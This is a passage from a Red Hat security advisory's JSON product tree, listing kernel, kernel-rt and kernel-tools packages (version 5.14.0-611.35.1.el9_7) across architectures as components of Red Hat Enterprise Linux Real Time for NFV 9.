"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
